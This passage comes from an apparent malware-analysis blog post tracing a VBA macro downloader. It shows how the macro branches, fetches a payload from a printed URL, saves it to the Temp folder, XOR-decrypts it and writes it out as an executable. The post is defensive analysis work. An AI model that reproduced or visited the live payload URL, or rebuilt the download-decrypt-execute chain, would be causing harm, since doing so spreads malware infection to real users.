<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi24VzNGxoLCCmcS4pczAcQa5PdGPNM3iuoJqY9Gch92qoJT-oOvkLWMPGwfpNGFzrqRGIog9t9lGqO577_Ts2oOcK5pTMH1p6dK6b3yJ3HWxJqEBqiymwG8u9nqoOEMbvfvMaQhC8AfbUF/s1600/18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="73" data-original-width="409" height="57" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi24VzNGxoLCCmcS4pczAcQa5PdGPNM3iuoJqY9Gch92qoJT-oOvkLWMPGwfpNGFzrqRGIog9t9lGqO577_Ts2oOcK5pTMH1p6dK6b3yJ3HWxJqEBqiymwG8u9nqoOEMbvfvMaQhC8AfbUF/s320/18.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5FTpoDW8Okcj_BuxiKeER2mwSIXUJZg_POjHPMmWQ3W89yTZrgNkqrPjmiCB8PRivuV62yq1I3hnZPfcuoaB3NTg7LVdl1DFQ_6RF5Zusa71FHvfnUxpFzScsInCxj-A0ijnZL8RY536n/s1600/19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="179" data-original-width="619" height="92" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5FTpoDW8Okcj_BuxiKeER2mwSIXUJZg_POjHPMmWQ3W89yTZrgNkqrPjmiCB8PRivuV62yq1I3hnZPfcuoaB3NTg7LVdl1DFQ_6RF5Zusa71FHvfnUxpFzScsInCxj-A0ijnZL8RY536n/s320/19.png" width="320" /></a></div>
<div class="" style="clear: both; text-align: left;">
'ShugarMilk' is given the value of 64 above - this will translate into 'e', which needs to be less than 300 in order to execute the program to get the desired output:</div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZimlPLmVdG8jl3WB-lcjBdukkd4MQfMCzuvrwWJbkKd-HSNlCeLEcEXkzfrKMRszT0Z4-Zu02JflMp2DtS41buI-zjqoNU3jcw4dAgV91QjR57-DFfU0hjFpCl4uyWRXujt32bRhhZwTx/s1600/20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="421" data-original-width="653" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZimlPLmVdG8jl3WB-lcjBdukkd4MQfMCzuvrwWJbkKd-HSNlCeLEcEXkzfrKMRszT0Z4-Zu02JflMp2DtS41buI-zjqoNU3jcw4dAgV91QjR57-DFfU0hjFpCl4uyWRXujt32bRhhZwTx/s320/20.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFsIA6X7yVZQqD89ILo0iQpAXkgt2Bdp8nHXjXrZig5vny4Vd_0-IzxApeBoKKhst_E8IakIiB2TUTYQdItrxzKTNWggZMq2Hr3MBfYlFlVgq0HnRanEcpnZY4XrjrsNQxYmseGmZ78foK/s1600/30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="415" data-original-width="935" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFsIA6X7yVZQqD89ILo0iQpAXkgt2Bdp8nHXjXrZig5vny4Vd_0-IzxApeBoKKhst_E8IakIiB2TUTYQdItrxzKTNWggZMq2Hr3MBfYlFlVgq0HnRanEcpnZY4XrjrsNQxYmseGmZ78foK/s320/30.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<!--StartFragment-->BladeRunner_4
: "<a href="http://fondazioneprogenies.com/38rh76f">http://fondazioneprogenies.com/38rh76f</a>"
: String : Module1.ShugarMilk<!--EndFragment--><br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdRRUlxK-EPTJkwHX9DES9BYpH95CA6E3he8AReNsOJPjaU0mVn6_-bIH15FIna9MBt0JgJYLX2RawHNaaJ_x2WgeJlzHasRTC4eQN3v83OTyPzxKb4-PPXm4DyYdDdMEVpO4lSKnzaJd5/s1600/58.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="98" data-original-width="1600" height="38" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdRRUlxK-EPTJkwHX9DES9BYpH95CA6E3he8AReNsOJPjaU0mVn6_-bIH15FIna9MBt0JgJYLX2RawHNaaJ_x2WgeJlzHasRTC4eQN3v83OTyPzxKb4-PPXm4DyYdDdMEVpO4lSKnzaJd5/s640/58.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYyjjmF0PZRhX4f_ljdTxZv1asMOoqPtZKKFw4UE0h37w2Z1ZgL6imTtwWF4nRnmSihAaiJ6nHgIR5NP4iOeizsd_e8GLld7DhWrBfEpW_506lU5TeX_ehCjDNK5wHGlllrH3vJ0cWIhdp/s1600/31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="297" data-original-width="921" height="103" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYyjjmF0PZRhX4f_ljdTxZv1asMOoqPtZKKFw4UE0h37w2Z1ZgL6imTtwWF4nRnmSihAaiJ6nHgIR5NP4iOeizsd_e8GLld7DhWrBfEpW_506lU5TeX_ehCjDNK5wHGlllrH3vJ0cWIhdp/s320/31.png" width="320" /></a></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw4ZG3v-3yjrLgYhiSNkLKauNOKO2lNCprF6dKf3lKb6H2VD01XJQu1ysvMpRfAtsKZg39mu3kxucJTYZLv0gI57c7CXPJsHPyfQ3CEMOiqSjbsGtYso18mAfxSaT2NRdyYN-Ge6m_pKKH/s1600/32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="487" data-original-width="1199" height="129" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw4ZG3v-3yjrLgYhiSNkLKauNOKO2lNCprF6dKf3lKb6H2VD01XJQu1ysvMpRfAtsKZg39mu3kxucJTYZLv0gI57c7CXPJsHPyfQ3CEMOiqSjbsGtYso18mAfxSaT2NRdyYN-Ge6m_pKKH/s320/32.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJhTV6cvGVlL62Ul04VGfr_kBf03VVu07yHGRJx311LgNBhjGhqiDn6WVU5TW4RhYdcqkRMYSnwGJcVyBGPCRXC9O2FmJ-0ocEXG3WnKfxeueaz47WEnRLhMWZPF3J-k1sJHHOk-gDxaaj/s1600/33.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="103" data-original-width="483" height="68" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJhTV6cvGVlL62Ul04VGfr_kBf03VVu07yHGRJx311LgNBhjGhqiDn6WVU5TW4RhYdcqkRMYSnwGJcVyBGPCRXC9O2FmJ-0ocEXG3WnKfxeueaz47WEnRLhMWZPF3J-k1sJHHOk-gDxaaj/s320/33.png" width="320" /></a></div>
<br />
PlayCry 1 and PlayCry 2 execute different parts of the code:<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh56RJZLBxUR99eOrE18o6p0XnbpyZ_6WleSNmGr5A9v3Z0RTw0AiPH3vqlG8bTLLauZxGnf-gPSybXKhtNR3lCG3yd91XnO-6PrHKErXtIQ5eMPVDhpliBnHE4Y_JGykKQtJW2p2id0y4f/s1600/34.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="251" data-original-width="959" height="83" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh56RJZLBxUR99eOrE18o6p0XnbpyZ_6WleSNmGr5A9v3Z0RTw0AiPH3vqlG8bTLLauZxGnf-gPSybXKhtNR3lCG3yd91XnO-6PrHKErXtIQ5eMPVDhpliBnHE4Y_JGykKQtJW2p2id0y4f/s320/34.png" width="320" /></a></div>
PlayCry = 1<br />
This will execute:<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjG5xI80zKOttrNnO48PmbjDCKCX4NODSSOoTJqG2KvPADvvMTT_P0ubo1k1eDUavSJ91D84O6A5X41pmqb5v_pClfwoCkthXJ1elnfo1DeVYIeZoXNJ2tgukSpgYCEpCMPHwKDsSYOa8po/s1600/35.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="317" data-original-width="1171" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjG5xI80zKOttrNnO48PmbjDCKCX4NODSSOoTJqG2KvPADvvMTT_P0ubo1k1eDUavSJ91D84O6A5X41pmqb5v_pClfwoCkthXJ1elnfo1DeVYIeZoXNJ2tgukSpgYCEpCMPHwKDsSYOa8po/s320/35.png" width="320" /></a></div>
<div class="" style="clear: both; text-align: left;">
PlayCry = 2</div>
<div class="" style="clear: both; text-align: left;">
This will take the 'Else' statement and execute a different part of the code, at lab1:</div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKof-zT155E4lAzhBhgcQlLdOxIwZSLpqc4Bayvgj-X0cxuyYHnhs0D46jlrG8Ze7LNDIZEGXB8DaDZZeoyBzI85BAM3EVoG2cov7s_j3ZSujNhNoNB07gRWu5-V5BBSurJ12pSkbWNEVt/s1600/36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="327" data-original-width="1195" height="87" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKof-zT155E4lAzhBhgcQlLdOxIwZSLpqc4Bayvgj-X0cxuyYHnhs0D46jlrG8Ze7LNDIZEGXB8DaDZZeoyBzI85BAM3EVoG2cov7s_j3ZSujNhNoNB07gRWu5-V5BBSurJ12pSkbWNEVt/s320/36.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqQmpjasFTdzdqgle_HO7AMIO2Z-1WvCYptUndeKEjpVvAM4S8ChMxRO73_wNxBpC3A-ecUiK5TDUBl9ffWscDSqZHvYI0KJiDRwXT9qaLQJRfrtBLQM0xrqRUpnpjj0CPV-iMJghfY1QX/s1600/37.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="179" data-original-width="1217" height="47" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqQmpjasFTdzdqgle_HO7AMIO2Z-1WvCYptUndeKEjpVvAM4S8ChMxRO73_wNxBpC3A-ecUiK5TDUBl9ffWscDSqZHvYI0KJiDRwXT9qaLQJRfrtBLQM0xrqRUpnpjj0CPV-iMJghfY1QX/s320/37.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKIOkqE6hyiZx3GPUs1LDxiuiYUibF1brC2SY_GkaRLopRPtOmwiCeV7ld18CTDO4Uz0t3q9QiKqTxsHGsuQxbXrc2pZM7fp_FTvrtBXc6iTTroCus2-ciT3BDL-YLqxZfuJS2eqX3BTPz/s1600/38.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="179" data-original-width="1001" height="57" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKIOkqE6hyiZx3GPUs1LDxiuiYUibF1brC2SY_GkaRLopRPtOmwiCeV7ld18CTDO4Uz0t3q9QiKqTxsHGsuQxbXrc2pZM7fp_FTvrtBXc6iTTroCus2-ciT3BDL-YLqxZfuJS2eqX3BTPz/s320/38.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh09F97sK3oq1I0mmJUJ3Sz1nL_QJiQaQx95-qhqoaL9XUmbMapKq2lqKgDuocglsrQENbc4bW505LH6udnkqSWuPwFICM3OAzhcxZiTTT2n5-VGgC1DkC6QKOD5mOpmAqt1q70AjAgWBX7/s1600/39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="313" data-original-width="409" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh09F97sK3oq1I0mmJUJ3Sz1nL_QJiQaQx95-qhqoaL9XUmbMapKq2lqKgDuocglsrQENbc4bW505LH6udnkqSWuPwFICM3OAzhcxZiTTT2n5-VGgC1DkC6QKOD5mOpmAqt1q70AjAgWBX7/s320/39.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiQdzoLv21DUacFBXQTXcyq3meOlzfd0Uh4t5CuGQirnql8-bhVLKlXIYuuC8wBkw7zK7saopbw0ptArmk_F8k5w5luyc4Wl6XV0-dNE_QWVC_eWLayoqMdxE-n65WudXmNAAZvxcuWb2s/s1600/40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="430" data-original-width="1073" height="127" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiQdzoLv21DUacFBXQTXcyq3meOlzfd0Uh4t5CuGQirnql8-bhVLKlXIYuuC8wBkw7zK7saopbw0ptArmk_F8k5w5luyc4Wl6XV0-dNE_QWVC_eWLayoqMdxE-n65WudXmNAAZvxcuWb2s/s320/40.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2Bc_g5NBKcpRBnJPxfNRmm47tLYMFK2N9DHmQOdQPkOV916w3EkzsmLfmUGspw1JKU-s1cirbh_Hc0-l5ccSooqUUpdaUDGy4aU9a284sKhlB_ur6GM3S6NS8O0cra4fkW3kfmOpXGuei/s1600/41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="237" data-original-width="555" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2Bc_g5NBKcpRBnJPxfNRmm47tLYMFK2N9DHmQOdQPkOV916w3EkzsmLfmUGspw1JKU-s1cirbh_Hc0-l5ccSooqUUpdaUDGy4aU9a284sKhlB_ur6GM3S6NS8O0cra4fkW3kfmOpXGuei/s320/41.png" width="320" /></a></div>
'sinus' is where all the downloaded data is processed:<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0RdUZLNNE3qqLS0LYYFDc3bLWkz5ZHM9gMG8XOVHyAWl3q0SkTD2vRI9qyZ3APBMgKGlygMxOF5JjPPJq2tXlQ7NbqzscUgxRV4TZde1YrS8jgA9NJsiGSLp5eWy8bfk1RMmtxxR-vAWB/s1600/42.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="345" data-original-width="983" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0RdUZLNNE3qqLS0LYYFDc3bLWkz5ZHM9gMG8XOVHyAWl3q0SkTD2vRI9qyZ3APBMgKGlygMxOF5JjPPJq2tXlQ7NbqzscUgxRV4TZde1YrS8jgA9NJsiGSLp5eWy8bfk1RMmtxxR-vAWB/s320/42.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLzdoyuz1EkbPpu4tBphtTC70y4_k2IyIRnrXkydjzeBlWIkWmrp2IVLaolHeSbHswSTVv7iRnLBehWoxvUWT0KY7DdRgYdxnV47ln506GHKd2yNdWmzydnk-OgmY5M9u4k704eVYMCVdZ/s1600/43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="405" data-original-width="779" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLzdoyuz1EkbPpu4tBphtTC70y4_k2IyIRnrXkydjzeBlWIkWmrp2IVLaolHeSbHswSTVv7iRnLBehWoxvUWT0KY7DdRgYdxnV47ln506GHKd2yNdWmzydnk-OgmY5M9u4k704eVYMCVdZ/s320/43.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibTAHSMf-b94CP9vEb4pV1ftG-BLMIoAqwqMmUy22tbHv-3zshjXeSFqNe_7vlh2lRvD6aLsLk7heB1qZI9xUcHVRwU7jPRUbzlJPp2v3nDugnpaT9jK1Bn0Ny6GrPcBS6lIxcah-OH0Bu/s1600/44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="141" data-original-width="1199" height="37" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibTAHSMf-b94CP9vEb4pV1ftG-BLMIoAqwqMmUy22tbHv-3zshjXeSFqNe_7vlh2lRvD6aLsLk7heB1qZI9xUcHVRwU7jPRUbzlJPp2v3nDugnpaT9jK1Bn0Ny6GrPcBS6lIxcah-OH0Bu/s320/44.png" width="320" /></a></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
BladeRunner_FLAME :
"C:\Users\RAGNAR~1\AppData\Local\Temp" : String : Module2.C2H5OH</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<!--StartFragment-->
<!--EndFragment--></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
BladeRunner_PathTo2 :
"C:\Users\RAGNAR~1\AppData\Local\Temp\<span style="background: lime; mso-highlight: lime;">hromberght8</span>" : String : Module1.mapRender</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNIryfI9FSJPvugmz2iAcCBHFCc4PhIvW0L4ha4QBkKUeaOkDBM7iTfyE93aSlbdRM5mRYLrf5ErBurlCDjjzST673P-o9w8P224YNVJY2jSDfSwpVC3sWEc9gm7_VAotFLbyhey17BNEK/s1600/45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="461" data-original-width="1075" height="171" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNIryfI9FSJPvugmz2iAcCBHFCc4PhIvW0L4ha4QBkKUeaOkDBM7iTfyE93aSlbdRM5mRYLrf5ErBurlCDjjzST673P-o9w8P224YNVJY2jSDfSwpVC3sWEc9gm7_VAotFLbyhey17BNEK/s400/45.png" width="400" /></a></div>
<br />
<div class="" style="clear: both; text-align: left;">
More processing:</div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEGgdF2LOsuv4x2KwfeYbNactxObmiI9sf5FeVM0j8pXuA0WjH8-M8Nyt9fz6mvWtwTNTL3sP-_rzjsxqM5hz5uBYCKk1WIPGNgu38SDTZMjlNCRsMjkfbJObslRmbmwrYwDQMK7sF4NZu/s1600/46.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="161" data-original-width="1447" height="43" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEGgdF2LOsuv4x2KwfeYbNactxObmiI9sf5FeVM0j8pXuA0WjH8-M8Nyt9fz6mvWtwTNTL3sP-_rzjsxqM5hz5uBYCKk1WIPGNgu38SDTZMjlNCRsMjkfbJObslRmbmwrYwDQMK7sF4NZu/s400/46.png" width="400" /></a></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<!--StartFragment-->BladeRunner_Project
: "C:\Users\RAGNAR~1\AppData\Local\Temp" : String : Module1.mapRender<!--EndFragment--></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
The file is being loaded:<br />
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDLaoXxrTEC3X7s0ijDn6XpCXB-n4QSl_KSvjLBp17HpgWSmP51bPpwys-R8E8r1k6bONysTXMOWCOfzTc6HAJW7E8ifWRG40UHipXxiwMWMNZR_V86vHoEnPy6xOPXDv4yWDkn7z9Mt7c/s1600/57.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1063" data-original-width="761" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDLaoXxrTEC3X7s0ijDn6XpCXB-n4QSl_KSvjLBp17HpgWSmP51bPpwys-R8E8r1k6bONysTXMOWCOfzTc6HAJW7E8ifWRG40UHipXxiwMWMNZR_V86vHoEnPy6xOPXDv4yWDkn7z9Mt7c/s400/57.png" width="286" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzwxpPT5uWDhinxFSCzwm5HHJtPQ7yU0IzGwaxks5ZG4NvhLUKcTvMbvbQ4jvrMuByQ897gkZ8xnum012IOc3-LFrL-A6t852fF9GQJ0Wny4J10HRbWCiwuLt6gHbqAq9mrMvTEZOfDBrk/s1600/47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="353" data-original-width="1209" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzwxpPT5uWDhinxFSCzwm5HHJtPQ7yU0IzGwaxks5ZG4NvhLUKcTvMbvbQ4jvrMuByQ897gkZ8xnum012IOc3-LFrL-A6t852fF9GQJ0Wny4J10HRbWCiwuLt6gHbqAq9mrMvTEZOfDBrk/s400/47.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFq-myTMjjKSzOD5mFTz0tgKkc3WDyJYakbaCeKaUhpTJCVTlC-lhMBeIsdT-zEaPB18BvJLtZog8-m9qGuIG7mhmtlZpKro1JVe0P78wwSPYgxPj4DsqcxQ4DZshyKXbbpP6ui0vzfgJR/s1600/48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="327" data-original-width="785" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFq-myTMjjKSzOD5mFTz0tgKkc3WDyJYakbaCeKaUhpTJCVTlC-lhMBeIsdT-zEaPB18BvJLtZog8-m9qGuIG7mhmtlZpKro1JVe0P78wwSPYgxPj4DsqcxQ4DZshyKXbbpP6ui0vzfgJR/s400/48.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzBM7uVb8veik823OJ8QBbeGeQtxA17HuqOgjL8_px1Rl172uh3zAswDED95vELDIi0_iLM1hdDsmVxIwRZy0XfE1qGyphOzPkI_cv0sEE0ghrs-c3vJC6YcgUatxXyHXmn49xWuE-6L45/s1600/49.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="205" data-original-width="621" height="105" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzBM7uVb8veik823OJ8QBbeGeQtxA17HuqOgjL8_px1Rl172uh3zAswDED95vELDIi0_iLM1hdDsmVxIwRZy0XfE1qGyphOzPkI_cv0sEE0ghrs-c3vJC6YcgUatxXyHXmn49xWuE-6L45/s320/49.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4LG_1Ctsj-AR8T0BZ3U2T4n4QIozW9ikz0qBhQrxBXON4usl0NvRKc8XY81veyi__7eGuDebgaRC6PJyVGSV5-zbJggDgBHWH_mC-8vhelnPzEglhwTDLJOjHiS-MG0QSRT_4db_Z5CpE/s1600/50.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="471" data-original-width="713" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4LG_1Ctsj-AR8T0BZ3U2T4n4QIozW9ikz0qBhQrxBXON4usl0NvRKc8XY81veyi__7eGuDebgaRC6PJyVGSV5-zbJggDgBHWH_mC-8vhelnPzEglhwTDLJOjHiS-MG0QSRT_4db_Z5CpE/s320/50.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHWdlmutc1tv5XZf8udUBalixMUjHhWqf6Ds2TirUEyDY_tEK9PpK8l037P5jp3Bvu7eHhiF-1RtIKOqyZHttVKdvAhY7q7hoEAy8S2ltTFlti1L8kM_UPniPTtUVJKU7nqhxGNsJubliL/s1600/51.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="337" data-original-width="567" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHWdlmutc1tv5XZf8udUBalixMUjHhWqf6Ds2TirUEyDY_tEK9PpK8l037P5jp3Bvu7eHhiF-1RtIKOqyZHttVKdvAhY7q7hoEAy8S2ltTFlti1L8kM_UPniPTtUVJKU7nqhxGNsJubliL/s320/51.png" width="320" /></a></div>
<div class="" style="clear: both; text-align: left;">
And now the data will be <b>decrypted</b>,<b> </b>using the running XOR key as shown below:</div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7DiuezmAoItsiJxjutvRS5LhrzJ8P06_D85fj-LKEPxJjdUHwVyDF_ZR4rcZZygt3ZCIr6_T1UYW_C7e3yT8b1rYsiBWHXog7Ub2OiczeQ22965IEO_J7noWds5P3C3OIn23o6JRLkDX3/s1600/52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="405" data-original-width="1477" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7DiuezmAoItsiJxjutvRS5LhrzJ8P06_D85fj-LKEPxJjdUHwVyDF_ZR4rcZZygt3ZCIr6_T1UYW_C7e3yT8b1rYsiBWHXog7Ub2OiczeQ22965IEO_J7noWds5P3C3OIn23o6JRLkDX3/s640/52.png" width="640" /></a></div>
<div class="" style="clear: both; text-align: left;">
These are the events that are executed from here on:</div>
<div class="" style="clear: both; text-align: left;">
<br /></div>
<div class="" style="clear: both; text-align: left;">
<br />
<ul style="text-align: left;">
<li><span style="font-size: 11pt;">Function WidthA will be called</span></li>
<li><span style="font-size: 11pt;">Dbbb is the file loaded as the encrypted payload (</span><b style="font-size: 11pt;">hromberght8</b><span style="font-size: 11pt;">)</span></li>
<li><span style="font-size: 11pt;">Dbbb is opened as bbb, for binary operations</span></li>
<li><span style="font-size: 11pt;">Gbbb will be ReDim - reading the bbb file from 0 To LOF (complete file) </span></li>
<li><span style="font-size: 11pt;">bbb will be saved as Gbbb</span></li>
<li><span style="font-size: 11pt;">PuWord function will now be called, which will have the Gbbb() and decryption key</span></li>
<li><span style="font-size: 11pt;">bbb will be PUT in Gbbb() for decryption and function WidthA will be called at this point</span></li>
<li><span style="font-size: 11pt;">bbb will now be GET from Gbbb() - this is the decrypted version - as be</span></li>
<li><span style="font-size: 11pt;">WidthA will process the file bbbJ (write it to disk as </span><b style="font-size: 11pt;">amigobro8.exe</b><span style="font-size: 11pt;">)</span></li>
<li><span style="font-size: 11pt;">This new file is the decrypted payload - ready to execute.</span></li>
</ul>
</div>
<div class="separator" style="clear: both; text-align: left;">
